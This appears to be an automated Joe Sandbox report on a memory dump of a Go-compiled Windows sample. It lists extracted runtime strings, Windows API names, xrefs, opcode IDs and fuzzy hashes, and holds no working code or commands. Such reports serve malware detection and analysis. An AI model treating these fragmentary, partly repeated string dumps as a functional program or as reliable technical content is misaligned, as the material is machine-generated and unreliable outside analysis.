                                                                                • work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcesses, xrefs: 00ACA14B, 00ACA1CC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcesses$nwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcda$runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemsscanstack - bad statussend on closed channelspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p s$runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2x509: invalid version%SystemR$work.nwait > work.nprocx509: invalid key usagex509: malformed UTCTimex509: malformed version116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAzerbaijan Standard TimeBangladesh Standard TimeBuildSecurityDescriptorW
                                                                                • API String ID: 0-3417598864
                                                                                • Opcode ID: 61162a50bf80196b38b38969bf114540b7da41093bee1c34b9ce174c9b335643
                                                                                • Instruction ID: c850e8d069620afe58c8fd8769267d708177db53c053d01a92c6bb731e32dfe4
                                                                                • Opcode Fuzzy Hash: 61162a50bf80196b38b38969bf114540b7da41093bee1c34b9ce174c9b335643
                                                                                • Instruction Fuzzy Hash: CBB112B46097448FC304EF64D694B6EBBE0BF88748F05896DF8899B392D775D848CB42
                                                                                Strings
                                                                                • newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebruaryFiel, xrefs: 00AE8066
                                                                                • casgstatus: bad incoming valuescheckmark found unmarked objectcoff symbols parsing failed: %ventersyscallblock inconsistent fmt: unknown base; can't happeninternal error - misuse of itabinvalid network interface indexmalformed time zone informationnon in-use s, xrefs: 00AE809A
                                                                                • runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedunrecognized PE machine: %#xunreserving unaligned regionx509: invalid DSA parametersx509: invalid DSA public keyx509: invalid RSA public key45474735088646411895751953125CM_Get_, xrefs: 00AE803C
                                                                                • 1, xrefs: 00AE7FF8
                                                                                • casgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characternot enough sign, xrefs: 00AE7FEF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebruaryFiel$1$casgstatus: bad incoming valuescheckmark found unmarked objectcoff symbols parsing failed: %ventersyscallblock inconsistent fmt: unknown base; can't happeninternal error - misuse of itabinvalid network interface indexmalformed time zone informationnon in-use s$casgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characternot enough sign$runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedunrecognized PE machine: %#xunreserving unaligned regionx509: invalid DSA parametersx509: invalid DSA public keyx509: invalid RSA public key45474735088646411895751953125CM_Get_
                                                                                • API String ID: 0-853169293
                                                                                • Opcode ID: 338d3e5210659a015618ad3ca4cf4299cd5b77f268464b10d2b11e01909841f3
                                                                                • Instruction ID: bfb25da62673e884257652824010b8bdaa23b1b74ae8b891f4f77242dedc8674
                                                                                • Opcode Fuzzy Hash: 338d3e5210659a015618ad3ca4cf4299cd5b77f268464b10d2b11e01909841f3
                                                                                • Instruction Fuzzy Hash: AEA1F3745093859FC350EF29C19072EBBE1FF88344F5489ADE8958B362D775E84ACB82
                                                                                Strings
                                                                                • out of memory (stackalloc)persistentalloc: size == 0pkcs7: input data is empty required key not availableruntime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to me, xrefs: 00AF8004
                                                                                • stackalloc not on scheduler stackstoplockedm: inconsistent lockingstruct contains unexported fieldstimer period must be non-negativetoo many Answers to pack (>65535)too many levels of symbolic linksunaligned 64-bit atomic operationwaiting for unsupported file , xrefs: 00AF81EF
                                                                                • stack size not a power of 2startm: negative nmspinningstopTheWorld: holding lockstime: invalid location nametimer when must be positivetoo many callback functionsunsupported string type: %vwork.nwait was > work.nprocx509: malformed certificate args stack map e, xrefs: 00AF81D9
                                                                                • !, xrefs: 00AF81F8
                                                                                • out of memoryparsing time powrprof.dll, xrefs: 00AF80CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !$out of memory (stackalloc)persistentalloc: size == 0pkcs7: input data is empty required key not availableruntime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to me$out of memoryparsing time powrprof.dll$stack size not a power of 2startm: negative nmspinningstopTheWorld: holding lockstime: invalid location nametimer when must be positivetoo many callback functionsunsupported string type: %vwork.nwait was > work.nprocx509: malformed certificate args stack map e$stackalloc not on scheduler stackstoplockedm: inconsistent lockingstruct contains unexported fieldstimer period must be non-negativetoo many Answers to pack (>65535)too many levels of symbolic linksunaligned 64-bit atomic operationwaiting for unsupported file
                                                                                • API String ID: 0-1005823644
                                                                                • Opcode ID: 3cb6dc06d4da442c1ee8bb7c1d14b356989805a1f9e6bca38804d294d6c4aa6d
                                                                                • Instruction ID: 0a0c6988c0fb2f58e7d53fe795836e9bb5c036fe5f2580c117903c1fb57ddeea
                                                                                • Opcode Fuzzy Hash: 3cb6dc06d4da442c1ee8bb7c1d14b356989805a1f9e6bca38804d294d6c4aa6d
                                                                                • Instruction Fuzzy Hash: 508167746083498FC704DFA9D58066EBBE1FF89300F54896DF9898B351DB38D949CB42
                                                                                Strings
                                                                                • persistentalloc: size == 0pkcs7: input data is empty required key not availableruntime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to metoo many colons in address, xrefs: 00ABB9D5
                                                                                • persistentalloc: align is too largepidleput: P has non-empty run queue of non-slice typeruntime: close polldesc w/o unblockruntime: createevent failed; errno=ryuFtoaFixed32 called with prec > 9strings.Reader.Seek: invalid whencesuperfluous lea, xrefs: 00ABB9A9
                                                                                • persistentalloc: align is not a power of 2runtime: blocked write on closing polldescsync/atomic: store of nil value into Valuetest executed panic(nil) or runtime.Goexitunexpected signal during runtime executionx509: %q cannot be encoded as an IA5Stringx509: RS, xrefs: 00ABB9BF
                                                                                • runtime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds out of range [:%x]x509: certificate is valid for x509: malformed GeneralizedTimex509: malformed subjectUniqueIDx509: malfor, xrefs: 00ABB982
                                                                                • *, xrefs: 00ABB9C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: *$persistentalloc: align is not a power of 2runtime: blocked write on closing polldescsync/atomic: store of nil value into Valuetest executed panic(nil) or runtime.Goexitunexpected signal during runtime executionx509: %q cannot be encoded as an IA5Stringx509: RS$persistentalloc: align is too largepidleput: P has non-empty run queue of non-slice typeruntime: close polldesc w/o unblockruntime: createevent failed; errno=ryuFtoaFixed32 called with prec > 9strings.Reader.Seek: invalid whencesuperfluous lea$persistentalloc: size == 0pkcs7: input data is empty required key not availableruntime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to metoo many colons in address$runtime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds out of range [:%x]x509: certificate is valid for x509: malformed GeneralizedTimex509: malformed subjectUniqueIDx509: malfor
                                                                                • API String ID: 0-4232192069
                                                                                • Opcode ID: cb3a85f24be706df4126fe0c5a53b48933aded2325aa0c10187925c1f823efe3
                                                                                • Instruction ID: 620cd47b9ea8e65088208e9fcffbdce4d274a269190979ff0270eafb1946188b
                                                                                • Opcode Fuzzy Hash: cb3a85f24be706df4126fe0c5a53b48933aded2325aa0c10187925c1f823efe3
                                                                                • Instruction Fuzzy Hash: 237145B4608349CFC704DF65D1907AABBE5FB88304F14886DE88987352E7B5E949CF92
                                                                                Strings
                                                                                • pacer: assist ratio=preempt off reason: .makeFuncStubruntime: double waitruntime: unknown pc selectgo: bad wakeupsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer , xrefs: 00ACCBD8
                                                                                • MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-Bytes, xrefs: 00ACCCA3
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00ACCCCD
                                                                                • ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTA, xrefs: 00ACCC6C
                                                                                • (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicF, xrefs: 00ACCBFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicF$ MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-Bytes$+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTA$pacer: assist ratio=preempt off reason: .makeFuncStubruntime: double waitruntime: unknown pc selectgo: bad wakeupsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer
                                                                                • API String ID: 0-2792116008
                                                                                • Opcode ID: e7ef2c75190840909edd228b263835583ca77907a8372ac8a3119b596a034bb0
                                                                                • Instruction ID: 4d8c0246e74d40e991ec4d707b5ae66f5e251990fe4feb362578d99b7ea18f7e
                                                                                • Opcode Fuzzy Hash: e7ef2c75190840909edd228b263835583ca77907a8372ac8a3119b596a034bb0
                                                                                • Instruction Fuzzy Hash: 0C710874908B468FC314EF29D194A6EBBF5BF89344F418A2DF88997351EB70D884DB42
                                                                                Strings
                                                                                • bad summary databad symbol tablecastogscanstatuscontext canceleddivision by zerogc: unswept spangcshrinkstackoffgetprotobynumberinteger overflowinvalid argumentinvalid encodinginvalid exchangeinvalid g statuslength too largemSpanList.insertmSpanList.removemess, xrefs: 00AD7ECD
                                                                                • runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2x509: in, xrefs: 00AD7E67
                                                                                • , npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateFileWDelayImportDeleteFileWDives_AkuruExitProcessFieldLayoutFreeLibraryGOTRACE, xrefs: 00AD7E23
                                                                                • , p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ARM little endianAdjustTokenGroupsAssemblyProcessorCertFindExtensionCreateFileMappingCreateStdDispatchCryptDecodeObjectDispGetIDsOfNamesDllGe, xrefs: 00AD7E99
                                                                                • runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirec, xrefs: 00AD7DF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: , npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateFileWDelayImportDeleteFileWDives_AkuruExitProcessFieldLayoutFreeLibraryGOTRACE$, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ARM little endianAdjustTokenGroupsAssemblyProcessorCertFindExtensionCreateFileMappingCreateStdDispatchCryptDecodeObjectDispGetIDsOfNamesDllGe$bad summary databad symbol tablecastogscanstatuscontext canceleddivision by zerogc: unswept spangcshrinkstackoffgetprotobynumberinteger overflowinvalid argumentinvalid encodinginvalid exchangeinvalid g statuslength too largemSpanList.insertmSpanList.removemess$runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirec$runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2x509: in
                                                                                • API String ID: 0-4196405881
                                                                                • Opcode ID: c91fb39681a87c092601d69e61770dbfe416f760feff7a881a892b917516c1ff
                                                                                • Instruction ID: d80923e6abe949bd73e3320f88bd1d05bfd2bbae847acfe585629636c0ac9762
                                                                                • Opcode Fuzzy Hash: c91fb39681a87c092601d69e61770dbfe416f760feff7a881a892b917516c1ff
                                                                                • Instruction Fuzzy Hash: F06103B59097458FC304EF25D19166EBBE1FF88308F90896EE8998B342E774D945CF82
                                                                                Strings
                                                                                • pacer: assist ratio=preempt off reason: .makeFuncStubruntime: double waitruntime: unknown pc selectgo: bad wakeupsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer , xrefs: 00ACCBD8
                                                                                • MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-Bytes, xrefs: 00ACCCA3
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00ACCCCD
                                                                                • ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTA, xrefs: 00ACCC6C
                                                                                • (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicF, xrefs: 00ACCBFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicF$ MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-Bytes$+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTA$pacer: assist ratio=preempt off reason: .makeFuncStubruntime: double waitruntime: unknown pc selectgo: bad wakeupsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer
                                                                                • API String ID: 0-2792116008
                                                                                • Opcode ID: 584f748d6de9bf0f52004b66f9a5314558a77fe505f73cb1605a6202edcbd29b
                                                                                • Instruction ID: 6fac53c24030a656832ad3b954073364bfbf072d51e890e599bf57e5988041d9
                                                                                • Opcode Fuzzy Hash: 584f748d6de9bf0f52004b66f9a5314558a77fe505f73cb1605a6202edcbd29b
                                                                                • Instruction Fuzzy Hash: E25112B4908B458FC314EF29D19476EBBE0BF89348F41492DF8899B352EB70D884CB52
                                                                                Strings
                                                                                • span has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p statex509: malformed issuerzero length BIT STRINGzlib: invalid checksum) must be a power of 223283064365386962, xrefs: 00AC2C7B
                                                                                • (, xrefs: 00AC2CC6
                                                                                • bad sweepgen in refillcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: internal inconsistencyinvalid number base %dkernel32.dll not f, xrefs: 00AC2CA7
                                                                                • refill of span with free space remaining : FieldByName of non-struct type rsa: internal error: inconsistent length : first argument is : duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memo, xrefs: 00AC2CBD
                                                                                • out of memoryparsing time powrprof.dll, xrefs: 00AC2C91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ($bad sweepgen in refillcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: internal inconsistencyinvalid number base %dkernel32.dll not f$out of memoryparsing time powrprof.dll$refill of span with free space remaining : FieldByName of non-struct type rsa: internal error: inconsistent length : first argument is : duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memo$span has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p statex509: malformed issuerzero length BIT STRINGzlib: invalid checksum) must be a power of 223283064365386962
                                                                                • API String ID: 0-3082307548
                                                                                • Opcode ID: 2007d24cae37390a0cba26dbe02d5d9fdcfc1be5e583c2a86f6a97e619adb30a
                                                                                • Instruction ID: 6ed17bd0367f9a16007971f89b447cec0d4632974dd9e171d9b05d6e53f86ad7
                                                                                • Opcode Fuzzy Hash: 2007d24cae37390a0cba26dbe02d5d9fdcfc1be5e583c2a86f6a97e619adb30a
                                                                                • Instruction Fuzzy Hash: 2C513AB45083048FC704EF25D590B6ABBE1FF84704F4189ADE8968B392DB74D959CF92
                                                                                Strings
                                                                                • % util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMIPS16ModuleMondayNativeRejangSCHED STREETSt, xrefs: 00ACF612
                                                                                • KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte li, xrefs: 00ACF5E8
                                                                                • [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseC, xrefs: 00ACF646
                                                                                • KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b, xrefs: 00ACF5B1
                                                                                • (forced) B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail =, xrefs: 00ACF66F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (forced) B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail =$ KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte li$ KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b$ [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseC$% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMIPS16ModuleMondayNativeRejangSCHED STREETSt
                                                                                • API String ID: 0-3417895583
                                                                                • Opcode ID: dc524650712033d123f7ccb3f72be8b0b37225db6392b4cba354ba8c624e902f
                                                                                • Instruction ID: 460b52175ed56940217b39bb424073ec492db686902de3b025c485a10ac3465d
                                                                                • Opcode Fuzzy Hash: dc524650712033d123f7ccb3f72be8b0b37225db6392b4cba354ba8c624e902f
                                                                                • Instruction Fuzzy Hash: 0251D3B4908B819FC304EF25E291B6EBBE1AF88748F41892DF4C88B352D774D944DB52
                                                                                Strings
                                                                                • wirep: invalid p statex509: malformed issuerzero length BIT STRINGzlib: invalid checksum) must be a power of 223283064365386962890625<invalid .Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDeleteVolumeMountPointWDestroyEnvi, xrefs: 00AEFED5
                                                                                • wirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= wo, xrefs: 00AEFE4D
                                                                                • wirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundx509: malformed spkizlib: invalid header of unexported method pcHeader.textStart= previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPri, xrefs: 00AEFEF4
                                                                                • ) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWDeclSecurityDispCallFuncDispGetParamECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCExportedTypeFieldMarshalFindNext, xrefs: 00AEFEA1
                                                                                • ()*+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02, xrefs: 00AEFE77
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
